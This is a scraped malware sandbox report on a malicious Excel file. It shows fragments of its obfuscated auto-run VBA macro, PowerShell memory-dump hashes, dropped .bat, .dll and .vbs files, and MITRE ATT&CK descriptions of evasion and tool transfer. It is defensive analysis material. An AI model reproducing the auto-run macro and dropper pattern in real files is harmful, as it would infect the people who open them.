Part of subcall function sdfhSDFasw3erhkswdgSDYHsd@dfkj3ghrksldjkgf: Count
Part of subcall function sdfhSDFasw3erhkswdgSDYHsd@dfkj3ghrksldjkgf: vbTab
Part of subcall function sdfhSDFasw3erhkswdgSDYHsd@dfkj3ghrksldjkgf: vbCrLf
Part of subcall function sdfhSDFasw3erhkswdgSDYHsd@dfkj3ghrksldjkgf: Format
Part of subcall function sdfhSDFasw3erhkswdgSDYHsd@dfkj3ghrksldjkgf: MsgBox
Part of subcall function sdfhSDFasw3erhkswdgSDYHsd@dfkj3ghrksldjkgf: vbInformation
Part of subcall function sdfhSDFasw3erhkswdgSDYHsd@dfkj3ghrksldjkgf: Tag
Part of subcall function sdfhSDFasw3erhkswdgSDYHsd@dfkj3ghrksldjkgf: Cells
Part of subcall function sdfhSDFasw3erhkswdgSDYHsd@dfkj3ghrksldjkgf: Areas
Part of subcall function sdfhSDFasw3erhkswdgSDYHsd@dfkj3ghrksldjkgf: Selection
Part of subcall function sdfhSDFasw3erhkswdgSDYHsd@dfkj3ghrksldjkgf: CreateObject
Part of subcall function sdfhSDFasw3erhkswdgSDYHsd@dfkj3ghrksldjkgf: Tag
Select

Strings	Decrypted Strings
""""
"qew"
"qew"
""""
"err"
"A3"

Line	Instruction	Meta Information
28	Private Sub Workbook_Open()
29	Dim strFindData as String	executed
30	Dim rgFound as Range
31	Dim i as Integer
32	If i = 567 Then
33	strFindData = InputBox("qew")	InputBox
34	For i = 1 To Worksheets.Count	Count Worksheets
35	With Worksheets(i).Cells
36	Set rgFound = . Find(strFindData, LookIn := xlValues)	xlValues
37	If Not rgFound Is Nothing Then
38	Sheets(i).Select	Select
39	rgFound.Select	Select
40	Exit Sub
41	Endif
42	End With
43	Next	Count Worksheets
44	MsgBox ("")	MsgBox
45	Else
45	dfkj3ghrksldjkgf.sdfhSDFasw3erhkswdgSDYHsd
46	strFindData = "err"
46	Range("A3").Select	Select
47	Endif
48	End Sub

Non-Executed Functions

Function
GFaserjlkjshlkhlkjsAPIs: 9, Strings: 22, Number of lines: 19, Relevance: 46.519

APIs	Meta Information
Range
IsEmpty
IsText
IsLogical
IsErr
IsDate
InStr
Text
IsNumeric

Strings	Decrypted Strings
"A1"
"134"
":"
";"
"Z"
"adsfq"
"dsf"
"s"
"134"
"134"
"adsfq"
"adsfq"
";"
";"
"Z"
"Z"
"dsf"
"dsf"
":"
":"
"s"
"s"

Line	Instruction	Meta Information
9	Function GFaserjlkjshlkhlkjs(rgRange as Range) as String
10	Set rgRange = rgRange.Range("A1")	Range
11	Select Case True
12	Case IsEmpty(rgRange)	IsEmpty
13	GFaserjlkjshlkhlkjs = "134"
14	Case Application.IsText(rgRange)	IsText
15	GFaserjlkjshlkhlkjs = "adsfq"
16	Case Application.IsLogical(rgRange)	IsLogical
17	GFaserjlkjshlkhlkjs = ";"
18	Case Application.IsErr(rgRange)	IsErr
19	GFaserjlkjshlkhlkjs = "Z"
20	Case IsDate(rgRange)	IsDate
21	GFaserjlkjshlkhlkjs = "dsf"
22	Case InStr(1, rgRange.Text, ":") <> 0	InStr Text
23	GFaserjlkjshlkhlkjs = ":"
24	Case IsNumeric(rgRange)	IsNumeric
25	GFaserjlkjshlkhlkjs = "s"
26	End Select
27	End Function

Reset < >

Analysis Process: powershell.exePID: 3464, Parent PID: 3436COMMON

Executed Functions

Function 000007FE8B7339FE Relevance: .4, Instructions: 438COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.482487093.000007FE8B730000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE8B730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7fe8b730000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7657407dc173adccc118bdce7773494f605f9691648e2e01b0ebacf2c9ee1f18
Instruction ID: 55e97f990f354af96cdd43970365b939abefe7a5ee136e0b649c59b914784665
Opcode Fuzzy Hash: 7657407dc173adccc118bdce7773494f605f9691648e2e01b0ebacf2c9ee1f18
Instruction Fuzzy Hash: AAD1202051EBCA4FE357A73C59206A17FE2EF4B244F1901EED08ECB1B3C6199866C361

Function 000007FE8B733AC9 Relevance: .4, Instructions: 375COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.482487093.000007FE8B730000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE8B730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7fe8b730000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9bbcc595b6206e50bfc7a0008c61410370e02ef303834ab4c0d2de5c6a16d4a3
Instruction ID: 78469707bf71a23028c71e0a209f2087194532c4a24793f588d81d834b2f0817
Opcode Fuzzy Hash: 9bbcc595b6206e50bfc7a0008c61410370e02ef303834ab4c0d2de5c6a16d4a3
Instruction Fuzzy Hash: B5C1462051EBCA4FE35AA72C49546717FA2EF4A348F5902EED4CDCB1B3C6189C62C361

Function 000007FE8B735219 Relevance: .3, Instructions: 303COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.482487093.000007FE8B730000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE8B730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7fe8b730000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73c1900f6595e5658818ee0c54cc1a00d43e9c4c0a61140862eeddb4b0563ab0
Instruction ID: fed9d33fd0a9d1139cd8130cabbc7761ad4998c43350ec68303177220a5c87d4
Opcode Fuzzy Hash: 73c1900f6595e5658818ee0c54cc1a00d43e9c4c0a61140862eeddb4b0563ab0
Instruction Fuzzy Hash: 3081273091DB8D0FE749EB2C98456B57BE1FF8A354F1402AAD48EC31B3D625EC628351

Function 000007FE8B735240 Relevance: .2, Instructions: 186COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.482487093.000007FE8B730000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE8B730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7fe8b730000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e06349e825abb4420f5ce0a5676f52b11b7ba2cf003a5c7f42f2e5445c67406
Instruction ID: 2049f100b9baeab4deb5d4b999d41f02e28e3d69e11b087f498756225e5faaab
Opcode Fuzzy Hash: 9e06349e825abb4420f5ce0a5676f52b11b7ba2cf003a5c7f42f2e5445c67406
Instruction Fuzzy Hash: 7E51112081EBCA0FE746E72C54607B47FE1EF4A254F5902EAD0CDC72B3C625AC668352

Function 000007FE8B66BA39 Relevance: .1, Instructions: 148COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.482416251.000007FE8B660000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE8B660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7fe8b660000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70a6c068aab107500cbd3e28eb1a0963637e183bf629ffd120575fdf32876020
Instruction ID: fc6db943e960153813e8ff92f76c61b2c0979edd9ab4128f56197cc57606a9ff
Opcode Fuzzy Hash: 70a6c068aab107500cbd3e28eb1a0963637e183bf629ffd120575fdf32876020
Instruction Fuzzy Hash: 05417B70908A0C8FEB98EF58D849BEDBBF5EB55311F10416ED04ED7262DB309985CB81

Function 000007FE8B66B324 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.482416251.000007FE8B660000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE8B660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7fe8b660000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21c48307d544e082c9e6765e96ec524fb415b5675560a74ddba20ba4508e5497
Instruction ID: 9ca3fd0182308d3f4adf44b6d3fe89c175f38daa10d5b8b33b54994939e21df2
Opcode Fuzzy Hash: 21c48307d544e082c9e6765e96ec524fb415b5675560a74ddba20ba4508e5497
Instruction Fuzzy Hash: E3316E70A08A1C8FEBA4EB68D885BE8B7F1FB55314F5081AAC04DD3252DA35A985CF40

Function 000007FE8B66B2EF Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.482416251.000007FE8B660000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE8B660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7fe8b660000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91c9d61a8ad3606dcae984f4b0957c4862d993e1fc80427cf5c9db08d49e3183
Instruction ID: 084b35f45c28a956a6350939c8f433a1c730cca809422dbb09bacb8e5c4cc905
Opcode Fuzzy Hash: 91c9d61a8ad3606dcae984f4b0957c4862d993e1fc80427cf5c9db08d49e3183
Instruction Fuzzy Hash: 7921A130A0CA4C8FEB44EB6CD446BECBBF1EB56314F14416DD04ED72A2CA35A842CB41

Non-executed Functions

Function 000007FE8B7300DD Relevance: 11.3, Strings: 8, Instructions: 1328COMMON

Download Yara Rule

Strings

(Ua, xrefs: 000007FE8B7302CB
(Ua, xrefs: 000007FE8B73060E
(Ua, xrefs: 000007FE8B7302B9
(Ua, xrefs: 000007FE8B73069B
(Ua, xrefs: 000007FE8B73023E
/X, xrefs: 000007FE8B730A5B
(Ua, xrefs: 000007FE8B730689
/X, xrefs: 000007FE8B730C14

Memory Dump Source

Source File: 00000005.00000002.482487093.000007FE8B730000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE8B730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7fe8b730000_powershell.jbxd

Similarity

API ID:
String ID: (Ua$(Ua$(Ua$(Ua$(Ua$(Ua$/X$/X
API String ID: 0-3172362523
Opcode ID: b3ced7fe5d5214003320b2cd2217ddd7c1fe25979f2bbc238ed2c855837e3bbe
Instruction ID: ab247f34e6a79b900c5739eac507c917469b886ecc98373d1933ced0c1ff98c0
Opcode Fuzzy Hash: b3ced7fe5d5214003320b2cd2217ddd7c1fe25979f2bbc238ed2c855837e3bbe
Instruction Fuzzy Hash: 0C82232090EBCA4FE75AA76C58613B57FE1EF4A254F5801EFC08EC71B3D619A826C351

Function 000007FE8B730F51 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.482487093.000007FE8B730000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE8B730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7fe8b730000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16088d982e3b81418fe319bee64d1b4ab3ad634f8eaee1200b2dd28299864c40
Instruction ID: 60187c25a885eed856314ecf219a97f13fcbc13c7d4abff42b6b8a0bcfe1a449
Opcode Fuzzy Hash: 16088d982e3b81418fe319bee64d1b4ab3ad634f8eaee1200b2dd28299864c40
Instruction Fuzzy Hash: 7A11AD1160E7C60FE307A73C69256A93FA19F8B250B5A01E7D08DCB6B3D50C4E568361

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make a payload or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the device or in transit. This is common behavior that can be used across different platforms and the network to evade defenses. Payloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used during Initial Access or later to mitigate detection. Portions of files can also be encoded to hide the plaintext strings that would otherwise help defenders with discovery. Payloads may also be split into separate, seemingly benign files that only reveal malicious functionality when reassembled.
Tactics:	Defense Evasion
Data Sources:
Platforms:	Android, iOS
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate.Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: `rundll32.exe {DLLname, DLLfunction}` ).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report xxTupY4Fr3.xlsx

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\jledshf.bat

C:\ProgramData\vbkwk.dll

C:\ProgramData\wetidjks.vbs

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\0id5ifws.ib3.ps1

C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd

C:\Users\user\AppData\Local\Temp\bke2j5og.tns.ps1

C:\Users\user\AppData\Local\Temp\hieg3o1z.kn0.psm1

C:\Users\user\AppData\Local\Temp\jynxjtqa.ad3.psm1

C:\Users\user\AppData\Local\Temp\u4rta33w.s1l.psm1

C:\Users\user\AppData\Local\Temp\uia5dhtc.x3m.ps1

C:\Users\user\AppData\Local\Temp\~DF13F08B5AA593F3CF.TMP

C:\Users\user\AppData\Local\Temp\~DF19A285229F022692.TMP

C:\Users\user\AppData\Local\Temp\~DF37CAD9B92CF722FF.TMP

C:\Users\user\AppData\Local\Temp\~DF498607F26789DF58.TMP

C:\Users\user\AppData\Local\Temp\~DF604FCF5437480BE4.TMP

C:\Users\user\AppData\Local\Temp\~DF93DA11A6F6B09AA3.TMP

C:\Users\user\AppData\Local\Temp\~DFF8C88563BA72F0E8.TMP

Windows Analysis Report
xxTupY4Fr3.xlsx

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre